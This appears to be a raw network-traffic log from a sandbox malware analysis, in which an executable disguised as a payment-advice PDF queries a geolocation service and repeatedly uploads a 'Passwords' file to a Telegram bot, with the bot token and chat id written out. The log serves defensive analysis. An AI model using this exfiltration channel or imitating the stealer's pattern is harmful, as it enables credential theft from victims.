                                                                                                              2024-12-19 14:28:52 UTC1390INData Raw: 18 b1 c7 a8 82 d1 a0 9d e4 4a e2 85 e7 24 7f 98 e9 2b 84 cb 08 8f d5 19 b5 fc 31 f2 7d 3a 78 d5 d0 3f 97 dd f0 f9 ac 97 8d 18 40 b7 13 39 a9 11 65 1e 86 dd 94 6d 3b 67 c5 79 0f 57 da 00 47 71 97 1f b8 f8 f8 d6 db 49 48 96 95 d2 66 2b bc c3 f4 7c 85 45 c5 16 be a9 f3 dd 10 d3 d1 04 6b d0 f6 69 8b e9 81 58 8e 83 51 45 bc c9 bb 35 da 4b ee 86 77 3d a0 71 99 d1 36 ea 67 37 fd c8 63 9b 24 f4 d1 fc 55 21 64 fb bf d2 a3 d9 71 22 06 4d 34 b4 59 72 4e 87 13 5b e3 a9 b5 1c 0b 39 f0 cd c4 b4 98 89 10 bc d6 62 fa f9 4b c5 a9 d8 c8 f7 d6 d1 51 0b d4 32 82 d3 a0 e9 1d 04 65 9b 8f 19 dd 7f af 43 dd 4a 35 19 a8 1c 98 09 5a 04 0b f7 3b 9f f9 16 9d c5 8c 5a 50 7f fe fc 08 69 ea 9c 2f 3d e9 c9 bb 01 ad 03 9f a0 9f 0f 33 46 2e 5b e8 ce ff dd aa d6 cd 0c da 1e 45 7a 5a b4 40
                                                                                                              Data Ascii: J$+1}:x?@9em;gyWGqIHf+|EkiXQE5Kw=q6g7c$U!dq"M4YrN[9bKQ2eCJ5Z;ZPi/=3F.[EzZ@
                                                                                                              2024-12-19 14:28:52 UTC1390INData Raw: 1e d3 fb 5d a4 83 eb e3 f3 2f 3b f8 3a 22 88 12 7c d3 4b 67 bb 64 19 bb c7 70 d2 db 05 96 5d df a9 1f fc 89 de 5a 94 a0 71 4a b1 e4 eb 3e d4 6c 98 83 c3 f8 75 06 1f ef bb 49 1f d6 0d d3 c6 0d 62 fa 02 f4 cf b3 52 d1 d2 a1 42 6d f6 10 31 90 0d 3f 98 ab 11 dc 02 13 8a 23 db 6b 15 50 f5 07 ca 0c 2d 90 65 be 87 6e 1d 27 54 a3 3b 56 5e 02 fa ac ea 35 96 34 bf 10 27 a7 a4 22 ac 73 4b b6 fc 59 cf 03 54 5a 43 11 71 20 bf 63 a9 26 ce 58 cb c1 f5 a5 8a 9a 60 b5 29 b5 3c ab 38 bd ba 8c a5 f6 ae eb fa f8 d0 f8 37 6d 64 33 86 15 bb e6 df 6d 41 5b de 40 3e e9 29 55 41 3a 85 43 a7 5b 6b 27 43 fc 1c 12 dd 17 11 bd 34 52 77 6b 10 4c df 76 2c 53 e1 23 4a 58 4e 2d 63 1a a2 6f 5c 04 e5 0c 47 0e 3b 89 ed 29 3d 44 e3 91 56 50 c1 fb 39 ba a4 d7 6e b3 59 86 d7 15 ad a5 b3 ac 93
                                                                                                              Data Ascii: ]/;:"|Kgdp]ZqJ>luIbRBm1?#kP-en'T;V^54'"sKYTZCq c&X`)<87md3mA[@>)UA:C[k'C4RwkLv,S#JXN-co\G;)=DVP9nY
                                                                                                              2024-12-19 14:28:52 UTC1390INData Raw: 69 ce df 7d 5d 63 28 ad 6e 92 58 6f de f0 4b 8b 18 f1 78 da 26 20 ad 54 15 18 18 ef be 41 28 4d 47 7c a8 f6 57 6e 9b a5 e4 24 dc d4 be 58 76 e7 5b e0 69 86 af 21 66 d8 b5 5e 57 81 9c cb c7 b0 e8 58 c7 7c 0f c1 9e 9d 9d 40 47 a6 db df db 13 e5 6d b3 90 7b 0d 3e 92 9d f6 3e 55 01 35 a7 ef dc 80 00 60 4c 94 6a eb 2d f5 6e 8d df 78 cb 43 2f bc 8c a1 37 45 89 31 3a 1c a5 08 fd 72 1b f4 9c 0f f7 e8 c2 7b 56 bc 3f 2a fc 31 86 ad b0 67 e7 99 ed 1c b6 f3 87 f4 e1 20 1a 85 a7 e2 d8 46 d2 20 b1 cc 52 25 fc 95 51 ed d6 ee 4e e0 5c 22 85 8c 74 44 4e 79 22 ed 59 1e 3b f8 94 74 be 81 9c 4b 6a 48 ca 4a 25 64 0e 79 e3 5e a0 ce 8a 68 ee dc cf 7a f6 27 d5 c0 0e 39 11 37 db 4c d0 d4 63 dd 70 9d 4d 7a 70 13 6d e4 4d 91 f7 44 a3 c9 c2 5d 25 a8 40 a4 39 8d d7 55 0a 5f 9f 2a 29
                                                                                                              Data Ascii: i}]c(nXoKx& TA(MG|Wn$Xv[i!f^WX|@Gm{>>U5`Lj-nxC/7E1:r{V?*1g F R%QN\"tDNy"Y;tKjHJ%dy^hz'97LcpMzpmMD]%@9U_*)
                                                                                                              2024-12-19 14:28:52 UTC1390INData Raw: cd 4c c6 a2 78 70 29 c6 b5 97 bb f9 1e 27 51 f5 6b 7d e0 0e 9f 86 3c d2 96 50 a3 bc 5e f8 92 a7 4d 0a af 46 a4 cf 90 c9 fb 20 4a 02 a3 2c ba 5e 9c 31 dd 00 57 f0 02 1e 7e 79 ef ef 50 fb f9 fe a8 5f 4c f6 50 69 e0 c6 0a cc 28 5c 58 53 90 4c dd 49 60 dd 31 f7 f5 25 ca 96 92 bf dd d9 05 b1 6a 57 8f 1f a2 79 82 f9 2e 49 e4 71 92 0d 5b 6b 73 a4 58 99 b1 e2 c6 69 e5 fa e0 a3 df 24 d7 f4 87 19 b4 f6 db ba 5d 25 b7 92 9a 3f 91 ad 4c bd 8f 7c 52 34 85 b6 a3 11 70 c4 fb 5b fd 2e 75 05 0d cf 5a e3 78 66 b7 23 ed 97 99 dd a4 8d 14 7b de 1f c0 6e 90 1d e7 7e fc 09 d8 8c d6 bf 62 ec da c7 25 e7 cf 1e 1e 4a 92 e9 c8 61 b1 99 15 89 87 7b 32 4a 76 e3 53 8f 7a b4 37 f6 fc 8d 8d 5b 7b e1 9a f3 94 79 b6 3f 67 db 10 6d 2e 96 ce 0d d3 2c 91 98 8d b2 eb f4 d4 9b 54 fa b6 14 d9
                                                                                                              Data Ascii: Lxp)'Qk}<P^MF J,^1W~yP_LPi(\XSLI`1%jWy.Iq[ksXi$]%?L|R4p[.uZxf#{n~b%Ja{2JvSz7[{y?gm.,T


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.449739172.67.177.1344437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:28:56 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:28:57 UTC876INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:28:57 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 607306
                                                                                                              Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bw6u%2F4DmDFKcrf%2BlH1C9jWmjvA7g1VrNpZeoNypsUh0yLLWO4VqWYNMtViWKk%2FX4PLulYVaaQX3Tkcgeg4LOhcduPOpKB1gpCP4BIgKnpCfeMPiSEPsFuaczCQz6hMhTY7yTkvWi"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f481500ef8d4299-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1626&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1693735&cwnd=251&unsent_bytes=0&cid=914af2c17a77543c&ts=460&x=0"
                                                                                                              2024-12-19 14:28:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.449753149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:04 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd200f92d41c7f
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:04 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 30 66 39 32 64 34 31 63 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd200f92d41c7fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:05 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:05 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:05 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19615,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618545,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.449763149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:08 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd203eec4ed598
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 33 65 65 63 34 65 64 35 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd203eec4ed598Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:08 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:08 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:08 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19617,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618548,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.449775149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:11 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd2069d581a296
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2024-12-19 14:29:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 36 39 64 35 38 31 61 32 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd2069d581a296Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:12 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:12 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:12 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19619,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618552,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.449783149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:15 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd2095de551f02
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2024-12-19 14:29:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 39 35 64 65 35 35 31 66 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd2095de551f02Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:15 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:15 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:15 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19621,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618555,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.449794149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:18 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd20c046550980
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:18 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 63 30 34 36 35 35 30 39 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd20c046550980Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:19 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:19 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
